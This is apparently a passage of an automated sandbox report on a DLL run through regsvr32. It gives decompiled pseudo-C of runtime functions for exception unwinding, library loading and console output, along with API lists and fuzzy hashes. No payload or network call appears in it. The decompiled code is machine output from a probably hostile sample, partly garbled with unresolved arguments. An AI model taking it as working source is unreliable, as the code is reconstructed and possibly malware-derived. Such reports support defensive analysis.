				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

































                                                                                            0x180003328
                                                                                            0x180003335
                                                                                            0x18000333a
                                                                                            0x180003341
                                                                                            0x180003348
                                                                                            0x18000334b
                                                                                            0x18000334f
                                                                                            0x180003359
                                                                                            0x180003363
                                                                                            0x180003368
                                                                                            0x18000336b
                                                                                            0x180003376
                                                                                            0x18000337d
                                                                                            0x180003382
                                                                                            0x180003385
                                                                                            0x18000338a
                                                                                            0x180003390
                                                                                            0x180003399
                                                                                            0x1800033a5
                                                                                            0x1800033af
                                                                                            0x1800033c0
                                                                                            0x1800033cb
                                                                                            0x1800033d1
                                                                                            0x1800033db
                                                                                            0x1800033e1
                                                                                            0x1800033e6
                                                                                            0x1800033ea
                                                                                            0x1800033f3
                                                                                            0x1800033fc
                                                                                            0x180003401
                                                                                            0x18000340c
                                                                                            0x180003412
                                                                                            0x18000341f
                                                                                            0x180003426
                                                                                            0x18000342c
                                                                                            0x180003436
                                                                                            0x180003438
                                                                                            0x180003441
                                                                                            0x18000344c
                                                                                            0x180003458
                                                                                            0x180003464
                                                                                            0x18000346a
                                                                                            0x180003478
                                                                                            0x18000347c
                                                                                            0x180003486
                                                                                            0x180003490
                                                                                            0x1800034a1
                                                                                            0x1800034a7
                                                                                            0x1800034ae
                                                                                            0x1800034be
                                                                                            0x1800034c9
                                                                                            0x1800034ce
                                                                                            0x1800034d1
                                                                                            0x1800034d6
                                                                                            0x1800034da
                                                                                            0x1800034df
                                                                                            0x1800034e4
                                                                                            0x1800034eb
                                                                                            0x1800034f1
                                                                                            0x1800034f5
                                                                                            0x1800034f9
                                                                                            0x180003508
                                                                                            0x180003517
                                                                                            0x180003521
                                                                                            0x180003524
                                                                                            0x180003528
                                                                                            0x18000352f
                                                                                            0x180003539
                                                                                            0x180003540
                                                                                            0x180003546
                                                                                            0x18000354c
                                                                                            0x180003554
                                                                                            0x180003558
                                                                                            0x18000355f
                                                                                            0x180003568
                                                                                            0x18000356c
                                                                                            0x180003570
                                                                                            0x180003574
                                                                                            0x180003578
                                                                                            0x18000357b
                                                                                            0x18000358c
                                                                                            0x18000358f
                                                                                            0x180003594
                                                                                            0x1800035a1
                                                                                            0x1800035a4
                                                                                            0x1800035aa
                                                                                            0x1800035ac
                                                                                            0x1800035c7
                                                                                            0x1800035d2
                                                                                            0x1800035d8
                                                                                            0x1800035de
                                                                                            0x1800035e0
                                                                                            0x1800035e6
                                                                                            0x1800035e8
                                                                                            0x1800035ee
                                                                                            0x1800035f4
                                                                                            0x180003612
                                                                                            0x18000361a
                                                                                            0x180003622
                                                                                            0x18000362d
                                                                                            0x180003635
                                                                                            0x18000363e
                                                                                            0x180003647
                                                                                            0x18000364c
                                                                                            0x180003651
                                                                                            0x180003656
                                                                                            0x18000365d
                                                                                            0x180003668
                                                                                            0x18000366b
                                                                                            0x180003672
                                                                                            0x180003684
                                                                                            0x18000368a
                                                                                            0x18000368e
                                                                                            0x180003690
                                                                                            0x18000369c
                                                                                            0x1800036a6
                                                                                            0x1800036b9
                                                                                            0x1800036c7
                                                                                            0x1800036d1
                                                                                            0x1800036d3
                                                                                            0x1800036db
                                                                                            0x1800036e2
                                                                                            0x1800036f1
                                                                                            0x180003704
                                                                                            0x180003709
                                                                                            0x18000371a
                                                                                            0x18000371e
                                                                                            0x180003721
                                                                                            0x180003726
                                                                                            0x18000372b
                                                                                            0x18000372f
                                                                                            0x180003736
                                                                                            0x18000373b
                                                                                            0x180003740
                                                                                            0x180003745
                                                                                            0x18000374b
                                                                                            0x180003754
                                                                                            0x180003763
                                                                                            0x18000376b
                                                                                            0x180003772
                                                                                            0x18000377a
                                                                                            0x18000377f
                                                                                            0x180003784
                                                                                            0x18000378e
                                                                                            0x1800037af

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 849930591-393685449
                                                                                            • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                            • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                            • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                            • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0x5e1a320b5ccd
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0x5e1a320b5ccd
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

















                                                                                            0x18000a3dc
                                                                                            0x18000a3e1
                                                                                            0x18000a3e6
                                                                                            0x18000a3f8
                                                                                            0x18000a402
                                                                                            0x18000a418
                                                                                            0x18000a41f
                                                                                            0x18000a428
                                                                                            0x18000a42e
                                                                                            0x18000a437
                                                                                            0x18000a439
                                                                                            0x18000a43c
                                                                                            0x18000a444
                                                                                            0x18000a44d
                                                                                            0x18000a459
                                                                                            0x18000a45e
                                                                                            0x18000a464
                                                                                            0x18000a476
                                                                                            0x18000a47c
                                                                                            0x18000a488
                                                                                            0x18000a497
                                                                                            0x18000a499
                                                                                            0x18000a499
                                                                                            0x18000a49f
                                                                                            0x18000a4b0
                                                                                            0x18000a4b2
                                                                                            0x18000a4c6
                                                                                            0x18000a4c8
                                                                                            0x18000a4d0
                                                                                            0x18000a4dc
                                                                                            0x18000a4e8
                                                                                            0x18000a4f7
                                                                                            0x18000a4fd
                                                                                            0x18000a511
                                                                                            0x18000a517
                                                                                            0x18000a53d

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeLibraryProc
                                                                                            • String ID: api-ms-$ext-ms-
                                                                                            • API String ID: 3013587201-537541572
                                                                                            • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                            • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                            • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                            • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 50%
                                                                                            			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                            0x1800045bc
                                                                                            0x1800045c1
                                                                                            0x1800045c6
                                                                                            0x1800045e1
                                                                                            0x1800045ee
                                                                                            0x1800045fa
                                                                                            0x180004603
                                                                                            0x18000460c
                                                                                            0x180004615
                                                                                            0x180004621
                                                                                            0x180004626
                                                                                            0x18000462c
                                                                                            0x18000463b
                                                                                            0x180004641
                                                                                            0x180004647
                                                                                            0x18000464d
                                                                                            0x180004658
                                                                                            0x18000465a
                                                                                            0x18000465a
                                                                                            0x18000466f
                                                                                            0x180004671
                                                                                            0x180004679
                                                                                            0x180004685
                                                                                            0x180004691
                                                                                            0x1800046a0
                                                                                            0x1800046af
                                                                                            0x1800046af
                                                                                            0x1800046af
                                                                                            0x1800046ba
                                                                                            0x1800046bf
                                                                                            0x1800046cb
                                                                                            0x1800046d4
                                                                                            0x1800046d9
                                                                                            0x1800046e1
                                                                                            0x1800046e3
                                                                                            0x180004709

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 2559590344-2084034818
                                                                                            • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                            • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                            • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                            • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2506987500-0
                                                                                            • Opcode ID: d817b626ecd357e902e01f6c1570ab9f2756ec5fc51f0da8eea91c9e6fa7d082
                                                                                            • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                            • Opcode Fuzzy Hash: d817b626ecd357e902e01f6c1570ab9f2756ec5fc51f0da8eea91c9e6fa7d082
                                                                                            • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                            • String ID: CONOUT$
                                                                                            • API String ID: 3230265001-3130406586
                                                                                            • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                            • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                            • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                            • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1967609040-0
                                                                                            • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                            • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                            • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                            • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 63%
                                                                                            			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}



















                                                                                            0x180003b5c
                                                                                            0x180003b5f
                                                                                            0x180003b63
                                                                                            0x180003b67
                                                                                            0x180003b6b
                                                                                            0x180003b75
                                                                                            0x180003b78
                                                                                            0x180003b7e
                                                                                            0x180003b81
                                                                                            0x180003b84
                                                                                            0x180003b89
                                                                                            0x180003b8e
                                                                                            0x180003ba4
                                                                                            0x180003bac
                                                                                            0x180003bb0
                                                                                            0x180003bb6
                                                                                            0x180003bc0
                                                                                            0x180003bc4
                                                                                            0x180003bd2
                                                                                            0x180003bd8
                                                                                            0x180003be2
                                                                                            0x180003bec
